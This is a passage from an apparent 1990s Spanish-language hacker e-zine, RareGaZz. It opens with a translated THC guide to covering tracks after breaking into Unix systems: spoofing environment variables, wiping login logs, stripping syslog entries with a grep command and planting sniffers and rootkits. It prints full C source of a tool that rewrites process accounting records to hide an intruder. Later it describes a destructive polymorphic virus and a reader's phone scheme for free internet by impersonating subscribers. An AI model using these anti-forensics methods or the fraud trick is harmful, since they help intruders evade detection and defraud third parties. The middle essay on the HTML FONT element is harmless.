comandos para que nadie sospeche. La lista de procesos puede ser checada con "ps -ef" o "ps -auxwww" y los programas que consuman mas proceso del CPU apareceran con "top" ... asi que es muy facil monitorear los programas que los usuarios esten ejecutando. VI. TELNET Solo hay dos cosas que deben decirse sobre usar telnet con propositos de hackear. Primero NUNCA escribas "telnet objetivo.com.mx". Escribe "telnet" y despues "open objetivo.com.mx" que no mostrara como parametro en la lista de procesos a que sitio estas haciendo telnet. Segundo, algunos clientes telnet exportan variables de ambiente del sistema. Si tu hack es detectado y ellos pueden tracearte hasta el host origen ellos tambien tendran el nombre de la cuenta que usaste en el host origen. Asi que debes definir a cualquier cosa que quieras las siguientes variables antes de empezar telnet, rlogin o similares: USER, LOGNAME, UID, HOME, MAIL Para cambiar esas variables: SH : <variable>=<nuevo valor>;export <variable> ejemplo : USER=nadie;export USER CSH : setenv <variable> <nuevo valor> ejemplo : setenv USER nadie VII. REMUEVE TUS ARCHIVOS Cuanto intentes exploits -con exito o sin el- borralos inmediatamente despues de usarlos - especialmente si los usas en /tmp ! Si realmente necesitas trabajar en el directorio temporal (/incoming /temp) entonces crea un directorio como ".X11", y dale atributo 711. --> ! Los siguientes 2 puntos solo son posibles con acceso root ! <-- VI. MODIFICAR LOS LOGS Los logs mas importantes son LASTLOG, WTMP y UTMP Si tuviste exito en volverte root debes modificarlas. Pueden ser usualmente encontrados en /etc, /var/adm o /var/log pero pueden estar en cualquier otra parte. Que herramientas debo usar? ZAP (o ZAP2) es bueno, pero no te BORRA de los logs sino sobre-escribe las entradas con ceros. Antes de compilar ZAP debes revisar los paths definidos para los logs! Debes usar CLOAK2 que cambia los datos importantes en los logs pero no es posible compilarlo en todos los sistemas. Tambien puedes intentar CLEAR que REALMENTE elimina las entradas. VII. SYSLOG & LASTCOMM Debes checar el archivo de mensajes del logfile donde tal vez las entradas con tu cuenta hackeada se encuentren ahi. Usualmente se encuentra en /var/adm o /var/log ... la mayor parte del tiempo se llama "messages" pero puede tener otros nombres. Revisa el archivo /etc/syslog.conf para saber el path y el nombre del archivo con los logs. Para remover tu nombre de host del archivo "messages" ejecuta: "grep -v tu.host.com messages > /tmp/tmpfile; mv /tmp/tmpfile messages" LASTCOMM es una herramienta para guardar todos los comandos ejecutados, es una MALIGNA herramienta contra hackers pero la mayoria de las veces no se encuentra instalada. Ahora no tienes nada que temer, obten el programa ACCT de Zhart's y siente la libertad. VIII. INSTALANDO TROYAS Cuando instales un sniffer, recuerda que cualquiera puede ejecutar "ifconfig -a" para revisar si la tarjeta esta en modo promiscuo. Obten un rootkit para tu sistema UNIX y reemplazalo. X. FIN Nunca seas flojo y recuerda revisar al 100% tus acciones - o afrenta las consecuencias!! -------------------------------- ACCT CLEANER -------------------------------- Usage: <progname> -u user -f user [-t time]/[-b] [-p command] [-h] -u user_login (necessary) User to hide -f user_login (necessary) User to fake -t hh:mm dd/mm/yy (if not -b) Start editing from this date -b (if not -t) Start editing from file's beginning -p command_name (optional) Fake user only about this command -m (optional) CountDown Mask mode -h This help and exit If NO arguments are given program acts in interactive mode [- Configuration -] You must "#undef LINUX" or comment the "#define LINUX" line if you're compiling the program on a non-linux board. Then you should verify that the acct file is in "/var/adm/acct", otherwise you have to change the string "filename" in the "main" procedure. You can set the default user id's of the user you want to hide and of the user you want to show, stored in the variables "u_uid" & "f_uid"; this will work if "-f" and/or "-u" options are omitted while "-b" or "-t" are used. You can set the number of steps the program uses in the fast-search phase by defining the pre-processor variable STEPS: #define STEPS 500 Choose it by experimenting and comparing the dates reported by the program (fast-search/slow-search) with the time taken to reach standard targets (it depends on ACCT_file's size). [ Beware that giving a starting time (when running the program) which is relatively close (it depends on STEPS) to file's beginning time could generate problems (tipically make the program exit without doing anything). So, in this case, it's better (and more logical) to use the "beginning" option. ] #### By Zhart/THC (c) 1996 #### */ --------------------------------- Comienza Codigo----------------------------- #define LINUX #include <stdio.h> #include <sys/types.h> #include <sys/file.h> #include <unistd.h> #ifdef LINUX #include <linux/acct.h> #else #include <sys/acct.h> #endif #include <time.h> #include <pwd.h> #include <strings.h> #include <signal.h> #include <fcntl.h> #define SHOW /* Comment this line if don't want explicit evil messages */ /* compiled with the program (to protect from "strings") */ #define PWD 0 /* Set it to 1 to ask for a password in interactive mode */ /* and not showing help from command line */ #define STEPS 500 /* Number of steps to go back in fast search */ #define COUNTD 20 /* CountDown seconds (for mask mode) */ int u_uid=0; /* Default uid of user to hide */ int f_uid=3; /* Default uid of user to show */ char p_name[16]; /* Program to assign to fake_user */ int b_flag=0; /* Beginning (no date) flag */ int m_flag=0; /* CountDown Mask Mode flag */ char filename[30]; /* acct logging file */ int vWd () /* validatePwd - verifies program password */ { char word[10]; char token[10]; word[0] = 'z'; word[1] = 'h'; word[2] = 'a'; word[3] = 'r'; word[4] = 't'; word[5] = '\0'; scanf ("%s",token); if (strcmp(token,word)) return(0); else return(1); } void usage() { #ifdef SHOW if (!PWD) { printf("\nUsage: <progname> -u user -f user [-t time]/[-b] [-p command] [-m] [-h]\n"); printf("-u user_login (necessary) User to hide\n"); printf("-f user_login (necessary) User to fake\n"); printf("-t hh:mm dd/mm/yy (if not -b) Start editing from this date\n"); printf("-b (if not -t) Start editing from file's beginning\n"); printf("-p command_name (optional) Fake user only about this command\n"); printf("-m (optional) CountDown Mask mode\n"); printf("-h This help\n"); printf("If NO arguments are given program acts in interactive mode\n\n"); } #endif } int vUsr(char *name) /* verifyUser - returns the uid of a user's login name */ { struct passwd *pwt; if((pwt = getpwnam(name)) != NULL) return(pwt->pw_uid); else { #ifdef SHOW printf ("Error: %s is not a valid user\n",name); #endif exit(1); } } int readParams(char *args[],int ac,long *i) { struct tm t; int x; if (ac==1) return(0); else for(x = 1; x < ac; x++) { if(args[x][0] == '-') switch(args[x][1]) { case 'u': /* username to hide */ if((x + 1) < ac) u_uid=vUsr(args[++x]); break; case 'f': /* fake user to be shown */ if((x + 1) < ac) f_uid=vUsr(args[++x]); break; case 't': /* date since start scanning */ if((x + 2) < ac) sscanf(args[++x],"%d:%d",&(t.tm_hour),&(t.tm_min)); sscanf(args[++x],"%d/%d/%d",&(t.tm_mday),&(t.tm_mon),&(t.tm_year)); t.tm_sec=0; (t.tm_mon)--; t.tm_wday=0; t.tm_yday=0; t.tm_isdst=0; *i=mktime(&t); #ifdef SHOW printf ("\nInput time has been interpreted as: %.24s\n",ctime(i)); #endif break; case 'b': b_flag=1; break; case 'p': if((x+1) < ac) strcpy(p_name,args[++x]); break; case 'h': usage(); exit(1); case 'm': m_flag=1; break; } } return(1); } void readDate (long *i) /* Reads date and returns it in UTC (seconds) */ /* Interactive mode */ { struct tm t; printf("Please type time,day,month,year Ex: 13:15 27/10/83\n --> "); scanf("%d:%d %d/%d/%d", &(t.tm_hour),&(t.tm_min), &(t.tm_mday),&(t.tm_mon),&(t.tm_year)); t.tm_sec=0; (t.tm_mon)--; t.tm_wday=6; t.tm_yday=0; t.tm_isdst=0; *i=mktime(&t); printf ("Input time has been interpreted as: %.24s\n",ctime(i)); } void rUsrs() /* readUsers - Interactive mode */ { char u_name[16]; char f_name[16]; #ifdef SHOW printf("\nName of user to hide:"); #endif printf("\n --> "); scanf("%s",u_name); u_uid=vUsr(u_name); #ifdef SHOW printf("\nName of user to show:"); #endif printf("\n --> "); scanf("%s",f_name); f_uid=vUsr(f_name); } void Interactive(long *u_date) { char answer[16]; if (PWD) if (!vWd()) exit(1); startEnd(); if (PWD) getchar(); printf ("Start from beginning? [y/N]: "); if (getchar()=='y') b_flag=1; else readDate(u_date); rUsrs(); /* readProg */ getchar(); printf ("\nSpecify command? [y/N]: "); if (getchar()=='y') { printf(" ==> "); scanf("%s",answer); strcpy(p_name,answer); } } int startEnd() /* Prints dates of first and last log */ { struct acct actbuf; int fd; long endtime; #ifdef SHOW printf ("\n######## ACCT Handler by Zhart (c) 1996 ########\n"); #endif /* Open acct file in read-only mode*/ if((fd = open(filename,O_RDONLY)) == -1 ) return(-1); /* read the buffer */ if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) { (void)close(fd); return(0); } endtime=actbuf.ac_btime+actbuf.ac_etime; printf("\nFile starts at: %.24s\n",ctime(&endtime)); /* GotoENd */ if(lseek(fd,(long)(-sizeof(actbuf)),SEEK_END) < 0) { (void)close(fd); return(0); } /* Read the buffer */ if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) { (void)close(fd); return(0); } endtime=actbuf.ac_btime+actbuf.ac_etime; printf("File ends at: %.24s\n\n",ctime(&endtime)); (void)close(fd); } int reachFast (int fd,long u_date) { struct acct actbuf; int found=0; long endtime; /* Set offset to end of file */ if(lseek(fd,(long)(-sizeof(actbuf)),SEEK_END) < 0) { (void)close(fd); return(0); } while (!found) { /* Read the buffer */ if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) { (void)close(fd); return(0); } /* Verify date */ endtime=actbuf.ac_btime+actbuf.ac_etime; if (endtime < u_date) found=1; else /* Go down of STEPS lines <------ */ if(lseek(fd,(long)(-(STEPS*sizeof(actbuf))),SEEK_CUR) < 0) { (void)close(fd); return(0); } } printf ("Date reached (fast): %.24s\n",ctime(&endtime)); } int reachSlow (int fd,long u_date) { struct acct actbuf; int found=0; long endtime; while (!found) { /* Read the buffer */ if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) { (void)close(fd); return(0); } /* Verify date */ endtime=actbuf.ac_btime+actbuf.ac_etime; if (u_date<=endtime) found=1; } printf ("Date reached (slow): %.24s\n",ctime(&endtime)); } int verifyA (struct acct actbuf) /* verifyAct - Verifies if acct record must be edited */ { /* return(actbuf.ac_uid==u_uid); */ if (actbuf.ac_uid==u_uid) if (p_name[0]=='\0') return(1); else if (!strcmp(p_name,actbuf.ac_comm)) return (1); return(0); } int editA(int fd,struct acct actbuf) /* editAct - */ { printf("#"); fflush(stdout); actbuf.ac_uid = f_uid; actbuf.ac_flag &= ~ASU; if(lseek(fd,(long)(-sizeof(actbuf)),1) < 0) { (void)close(fd); return(0); } if(write(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) { (void)close(fd); return(0); } } int scanA (int fd) /* scanACCT - */ { struct acct actbuf; #ifdef SHOW printf ("Scanning data ...\n"); #endif while (1) { /* read buffer*/ if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) { (void)close(fd); return(0); } /* verify criteria matching and (eventually) start editing */ if (verifyA(actbuf)) editA(fd,actbuf); } } main(int argc,char *argv[]) { long u_date; int fd; filename[0]='/'; filename[1]='v'; filename[2]='a'; filename[3]='r'; filename[4]='/'; filename[5]='a'; filename[6]='d'; filename[7]='m'; filename[8]='/'; filename[9]='a'; filename[10]='c'; filename[11]='c'; filename[12]='t'; filename[13]='\0'; if (!readParams(argv,argc,&u_date)) Interactive(&u_date); else startEnd(); if (m_flag) { setuid(0); sleep(COUNTD); } /* Should insert a date validation */ #ifdef SHOW printf ("\nHiding user id: %d Showing user id: %d\n",u_uid,f_uid); #endif /* Open ACCT file in read/write mode */ if((fd = open(filename,O_RDWR)) == -1 ) return(-1); if (!b_flag) { reachFast(fd,u_date); reachSlow(fd,u_date); } scanA(fd); (void)close(fd); printf("\n"); } -----------------------------------FIN DEL CODIGO----------------------------- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Texto original por Van Hauser de THC traducido y revisado por CrackSmoker !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Que hay de malo con <FONT> ? Cuando Netscape introdujo su elemento <FONT>, con sus atributos SIZE= y COLOR=, muchos autores de paginas web dieron la bienvenida a la promesa de tener control sobre la presentacion de sus documentos; los mismos autores sintieron alivio cuando Microsoft introdujo un atributo adicional <FONT FACE=*>. Muchos de estos autores no se dieron cuenta que sus documentos se volverian invisibles, dificiles de leer o inaccesibles a muchas personas. Exactamente eso fue lo que paso debido a la implementacion de estos elementos unicamente a los navegadores populares. Las extensiones en HTML se dice que "degradan graciosamente" si no interfieren con la legibilidad en los navegadores que no soporten esas extenciones. Para los navegadores como Lynx, y otros que no soportan tamaños de fonts, colores o estilos, los efectos del elemento <FONT> son relativamente benignos. Si el autor trata de enfatizar un texto especifico por su tamaño o color, el usuario del navegador de modo texto (como Lynx) podra ver el texto pero no el enfasis. Los verdaderamente efectos del elemento <FONT> son reservados para los usuarios de los navegadores graficos mas populares como Netscape e Internet Explorer. Un usuario de netscape que tiene una laptop con una display relativamente pequeño tiene los small fonts configurados para poder ver una decente cantidad de material en su pantalla. El autor de un sitio web ha diseñado una tabla con <FONT SIZE=1>; este texto se mostrara tan pequeño que sera ilegible. Otro usuario con problemas de vista tiene su laptop configurada con extra large fonts, y el "diseñador web" decide hacer un comentario con <FONT SIZE=4>; ahora una pequeña frase ocupa la mayoria de la ventana, y el usuario permanece frustrado. Un tercer usuario tiene una sofisticada estacion de trabajo con un monitor extra grande (17"), pero, como el 10% de los usuarios masculinos, el tiene ceguera con los colores y necesita un fuerte contraste entre el texto ordinario y el background. El ha configurado su navegador para que use un texto negro con fondo amarillo, y ha especificado que esta configuracion permanezca a pesar de la pagina que visite. Pero llega a una "kewl" web page con texto blanco y un fondo negro. El usuario esta viendo negro en amarillo. Pero esta pagina tiene una sentencia por aqui y por alla con <FONT COLOR="yellow">--esto puede verse bien en el fondo negro que especifico el autor, pero es completamente invisible en el fondo amarillo del usuario. El quizas se pregunte que seran todos esos espacios vacios, pero a menos que vea el codigo fuente, el nunca sabra que se pierde una parte importante del mensaje. Mientras Netscape permite abolir los colores del cuerpo y texto de cualquier pagina, no permite abolir los colores de los fonts. El elemento FONT obstruye la presentacion de la informacion por hacer demasiadas asumciones sobre el sistema del usuario, navegador y configuracion. Si tienes algo que decir, informacion que dar a conocer, o sentimientos que expresar, entonces es tu interes hacer tu pagina accesible a todos. Inteligentes creadores de paginas, que desean hacer llegar su mensaje a todos, se mantienen lejos del elemento <FONT>. La solucion?? Hoy en dia muchas paginas permiten configurar la forma en que deseas verlas en forma de opciones de cascada. Asi, cualquier persona configura la pagina (no el navegador) para no perder informacion que tal vez, pueda ser valiosa. raretrip [ Nota: estamos estudiando la posibilidad de remover el elemento FONT de nuestra pagina pero aun no nos hemos decidido. sirve bastante bien para mejorar la presentacion de una pagina ;-) ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦΦ El padre de todos los virus ΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩΩ Segunda Parte ... Antes de desinfectarlo, el virus comprueba si el fichero abierto esta infectado usando el primer metodo (division por 9dh y resto igual 25h); posteriormente comprueba si el fichero es local o remoto (no accede a los discos remotos), y mira los punteros CS,SS y SP de la cabecera EXE. Tras haber hecho esto, finalmente compara el nombre del programa que abrio el fichero usando los CRCs con la lista de los 16 'programas fatidicos', y no lo desinfecta en caso de coincidencia. Al leer un fichero (ah=3fh) el virus llama a la rutina stealth. En caso de leer algunos de los bytes de la cabecera de un fichero infectado, el virus lee, desencripta y copia la cabecera original en el bufer de lectura, de forma que no se apreciaran los cambios en el fichero. Las llamadas a FindFirst/FindNext tambien son usadas por el virus para infectar. El Zhengxi guarda el nombre de uno de los ficheros encontrados por FindFirst, y el del quinto fichero, aproximadamente (probabilidad 3/16) encontrado por la funcion FindNext. El virus solo tiene un bufer para almacenar nombres de ficheros por lo que el siguiente nombre sobreescribe al anterior. Finalmente, al cerrar un fichero (ah=3eh), el virus busca e infecta el fichero cuyo nombre conserva en su bufer. Ademas, tambien infecta el fichero que se esta cerrando, solo que con una probabilidad 1/4 (el resultado sale de un randomizer propio). Infeccion Antes de infectar, el Zhengxi comprueba algunas condiciones: -El fichero no acaba de ser creado, es decir, no es un fichero reciente. -El fichero es local y no esta ni en A: o B: -El fichero no es *.?v? -Hay suficiente espacio en disco (lo comprueba con ah=26h, int 21h) En caso de cumplirse estas tres condiciones, el virus lee la cabecera y mira si es valida usando CRC's. Tambien hay que destacar que el virus no solo comprueba la cabecera sino que tambien comprueba otros campos y puntos del fichero para evitar la destruccion de ficheros de datos. Infeccion de EXE's Lo mas interesante del virus es cuando infecta ficheros EXE. Puede hacerlo de tres formas: anexandose al final (appending), insertandose (inserting) o infectando EXEs autoexpandibles (self-extracting). Primero el Zhengxi mira la estructura del fichero; en caso de ser un fichero autoexpandible (creado con zip2exe por ejemplo), el virus infecta el fichero adjunto (ZIP, ARJ, RAR) usando el metodo descrito mas abajo; crea un dropper COM y se anexa al fichero. Despues mira la longitud. Hay que destacar que no infecta ficheros menores a 400h (1204 bytes). Ademas chequea otros campos en la cabecera EXE, como el numero de items de recolocacion, marcas de empaquetadores (PkLite: este virus puede infectar ficheros comprimidos con pklite), y los campos de longitud. Si la longitud del modulo (NO la longitud del fichero) es mayor que 32k, el virus inserta su cargador en medio del fichero. Si no, el virus infecta el fichero usando el metodo appending. Al infectar archivos por este metodo, el virus lee la cabecera, la encripta y la guarda al final del fichero. Entonces ejecuta su generador polimorfico y guarda el cuerpo del virus encriptado y los loops polimorficos al final del fichero. Para acabar la infeccion, el virus incrementa la longitud del fichero hasta un valor que, dividido por 9dh, de de resto 25h (su marca de infeccion), y modifica los punteros de la cabecera EXE. Usando el mismo metodo CRC, el virus busca este codigo en el fichero, si no lo encuentra, el virus pasa el control directamente a la infeccion de tipo appending. En caso de exito, el virus busca en los siguientes 54h (80) bytes de codigo un ret o un far call (c3h, cbh, cfh, 9ah, cah, c2h) para no pasarse a la siguiente subrutina o direccion relocalizada. Si se encuentra ese codigo, el virus abandona la rutina de infeccion. Si no, el virus sobreescribe esos 54h bytes con el codigo del cargador del virus, encripta el codigo principal con su engine polimorfica y se copia al final del fichero. Despues de esto, al igual que hacia con el otro tipo de infeccion (appending), escribe un numero indeterminado de bytes aleatorios para usarlos como marca de infeccion. Al ejecutar el cargador del virus, este busca el nombre del host en los campos correspondientes del PSP (Program Segment Prefix), abre el fichero para luego mover el puntero al final, y alli leer, desencriptar y ejecutar la segunda parte del dropper. Esta parte restaura la subrutina parcheada, ubica la memoria del sistema (convencional o UMB), lee el cuerpo del virus y le da el control al loop de desencriptado polimorfico. Con el loop desencripta el cuerpo del virus y le pasa el control a la rutina de instalacion; el virus se instala en la memoria del sistema y le devuelve la ejecucion al fichero host. Este es un tipo de infeccion muy insidioso. El codigo virico esta escondido en el fichero, y no hay una entrada directa hacia el mismo desde la cabecera del fichero. El virus se inserta a si mismo en el lugar de una de las subrutinas del host. Incluso puede tratarse de una subrutina rara vez ejecutada. Por ejemplo, una subrutina que muestre un mensaje de error en la pantalla. De esta forma, el virus esta en estado 'latente' durante un largo periodo de tiempo, hasta que un buen dia 'sale al exterior' e infecta el sistema bajo determinadas condiciones. Infeccion de ficheros comprimidos En este tipo de infeccion, el virus crea en memoria la imagen de un archivo COM infectado, un dropper y lo introduce en el fichero comprimido. Este dropper siempre empieza con un jmp seguido de datos aleatorios, el virus encriptado, y el loop de desencriptado polimorfico. Esta introduccion (jmp) salta directamente al inicio del loop. El nombre del dropper tambien es aleatorio y lleva extension COM; he aqui algunos ejemplos de los nombres que puede llegar a tener: HAIF.COM, UCM.COM, DOO.COM, VLG.COM, etc. Para procesar los ficheros comprimidos y todos sus campos, el virus no se ayuda de ninguna utilidad externa. sino que usa sus propias rutinas de descompresion de ARJ, ZIP y RAR. Sin embargo, el virus no comprime el codigo del dropper; simplemente lo guarda en modo 'stored'. El virus no introduce su dropper en los ficheros comprimidos con PKzip en caso de que dentro de estos haya algun otro fichero ya comprimido con el metodo stored. Esto esta pensado para no introducir el dropper en mas de una ocasion dentro de los ficheros comprimidos. Payload El Zhengxi solo tiene un payload o rutina de activacion, excepto la que usa para retornar al DOS desde un COM. Esta rutina puede ser ejecutada mientras se estan procesando los archivos zips. Si el virus encuentra algun registro empaquetado con el modo 'stored', chequea la fecha, la hora y el 'sello' o marca del ZIP. Si el año de la ultima modificacion es igual o superior a 1996, el virus busca todos los ficheros de todos los directorios, desde la C: hasta la Z:, y los borra, incluyendo el arbol de subdirectorios (FAT). FINAL ~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗ ║╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝║ ║ ▐█▀█ ▐█▀▀█ ▐█▀▀█ ▐█▀█▀▄ ▐█▀▀▀ ▐█▀▀█ ▐█▀▀█ ▐█▀█ █ ▐█▀▀▀ ║ ║ ▐█▄█▄ ▐█ █ ▐█ █ ▐█ █ █ ▐█▄▄▄ ▐█▄▄█ ▐█▄▄█ ▐█ █ █ ▐█ ▄▄ ║ ║ ▐█▄▄█ ▐█▄▄█ ▐█▄▄█ ▐█ █ █ ▐█▄▄▄ ▐█ █▄ ▐█ █ ▐█ █▄█ ▐█▄▄█ ║ ║ ╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤╤ ║ ║ "Tu linea de comunicacion segura con el Underground" ║ ║ ║ ║╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗╔╗║ ╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝╚╝ MailBoy: KillerBot De nuevo un saludo a toda la p30pl3 y quisiera decirles la razon por la que esta seccion ya no se llama "CTRL - ALT - DEL". Resulta que cuando decidimos hacer esta seccion uno de nosotros sugirio ese nombre PERO no nos dijo que ya existia otra revista con una seccion igual!! A pesar de que esa publicacion quizas ni se haya enterado de que usamos el nombre de su seccion para los mismos fines en esta revista, decidimos cambiar el nombre de ahora en adelante a esta seccion. Saludos a los editores de esa revista -a los que aun no conocemos- y disculpen por el error. <<::RareGaZz::>> \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Mencionamos en un numero anterior que podian usar a televisa.com como un servidor email que no imprimia la direccion IP pero este servidor ya no realiza este favor a la comunidad cybernetica asi que no cuenten con que su direccion IP no sera impresa en sus mensajes. Mr.x \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Saludos a estas ciudades: Laredo Texas, Lima Peru, Monterrey Mexico, Viladecans España, Guatemala, Piura Peru, Montevideo Y a estas personas: PECAR Truco Orion Cnest Xdawn DuvaHazard Monra Por sus colaboraciones y/o apoyo para este numero. \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- por que copiaron el logo de CDC en su numero anterior para ponerle fin a su revista asi como ellos lo usan como footer para sus textos? [ Tienes razon, copiamos el logo de la vaca para nuestra revista. Tenemos que admitir que es un DAMN GOOD LOGO! como muchos no saben quienes son o que hacen los de CDC basta decir que escriben textos con temas abstractos. Al parecer sus iniciales significan: cult of the dead cat / cult of the disposable camera / cult of the drying cumstain / cult of the dead canary / cult of the dead chihuaha / cult of the dead cadillac / concentrated drag cweenz / cult of the douche condom / cult of the dope cut / cult of the dressed cabbage / cult of the dumb comedian / cult of the deadly carbonated_beverage / cult of the dead canine / cult of the dumb cow / cult of the disheiferist clep / cult of the duplicated copy / clean dildos in a cab / cows drowning cows / cult of the dumb cult / cult of the dildo that can / crowning dead corpses / cult of the disposable condom / cyber doodical c / can dogs croak? / cult of the dead cornflake / cult of the distinct color / cult of the dead crib / y a lo mejor, CULT OF THE DEAD COW ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Que tal, yo de nuevo felicitandolos por su reva, quisiera decirles que no existe el BBS Serpool en Puebla, existio! ahora son provedores de i-net, el numero es 375170, no el 402334 como lo decia en su reva en el articulo de Truco... xDAWN [ Ok nota tomada en cuenta. Thanx. ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Le PompeItor, LePompeItor o Le PompaItor ??? [ Oficialmente es: "LePompeItor" PERO cuando iniciamos el habia elegido ser conocido como "Le pompaItor". El error fue que el editor del segundo numero lo bautizo como "Le pompeItor" cambiando una "a" por "e". Al principio se puso una encabronada LePompeItor y recuerdo que una vez mientras haciamos chat tratabamos de convencerlo yo y rare de que por una simple letra no iba a pasar nada ... creimos haberlo convencido. 5 minutos despues reviso el correo y aparece un mensaje con el subject "KILLERBAT" que significa en español "Vampiro Asesino". RareTrip me habla en el canal y me dice que recibio un mensaje de LePompeItor con el subject "RARETRAP" que significa "Trampa Rara". En ese momento entendi claramente que a pesar de ser tan solo una letra, alteraba completamente el significado que para el tenia su nickname. Ahora ya esta repuesto de ese trauma y esperamos que luego regrese a la revista cuando termine sus examenes :-) ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- oye les paso un tip para accesso gratuito un mes en Telefonos de mexico lo ke tienes ke hacer es hablar a uno de estos telefonos. 525 2412222 DESDE EL D.F. 91 80077634 Interior de la Republica. Hablas y dice ke acabas comprar tu pakete de Internet de México en Sanborns y ke kieres activar tu cuenta como dice hay en el manual pero dilo con seguridad para ke no te pregunten nada agarra la seccion blanca y busca a un ingenuo ke si la cuenta pasa del mes te cobran 240 a tu recivo telefonico te pide nombre del ke sale el recibo es del ke biene en la seccion bl. das los datos lo unico a conseguir es la delegacion pero eso es facil... El telefono del modem es : 3289928 D.F. otro estado pregunta. Pregunta el DNS diles ke tienes NT y lo NECESITAS P.D. Tiene Buena Velocidad !!!!!! ATTN. AcidGum 97 \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Hola, acabo de visitar su pagina y se me hace muy buena, ¿hay modo de recibir la revista por e-mail cada que sale? no les costaria mucho trabajo y nos mantendrian contentos Arturo Vega [ Antes mandabamos la revista por email, pero era un pedo cuando rebotaban los mensajes asi que por ahora solo podemos avisar a la lista cuando un nuevo numero esta disponible. ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Primero MUCHAS FELICIDADES !!!! esta muy suave su web page sigan asi , me gustaria comentarles que tambien ustedes deverian de sacar cosas para macintosh tambien hay muchos usuarios de mac. Saludos Max [ Ya incluimos algunos programas para Mac's en nuestra seccion de WareZ, tambien en los links -seccion macintosh- encontraras varios lugares con programas para mac's. Ahora que nuestros textos tratan de ser igual de utiles para los usuarios de Mac's y Peces (excepto el warez incluido). ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- avisadme si cambiais la dirreccion, ok? =:) [ Cuando nos mudemos de servidor (esperamos sea pronto) todos los de la lista de correo seran notificados. Don't Worry! ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Me encanta raregazz aunque baje dos veces eudora pro y nunca le pude hacer el setup porque siempre le faltaron archivos.. como puedo hacerlo para que termine bien el downloading? [ Primer TRAGICO error de RareGaZz, al parecer el link para Eudora Pro no servia :-( disculpas... ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- hola amigos de RAREGAZZ tengo algunas dudas que quisiera me pudieran responder la primera es la sig. en la revista #3 en la seccion nueva tecnologia hablan acerca de cybermedia yo baje ese programa y quisiera saber si este tiene algun virus y si es asi que puedo hacer para quitarlo y si no me pudieran conseguir una clave para registrarlo, otra duda es que quise abrir una cuenta en hotmail 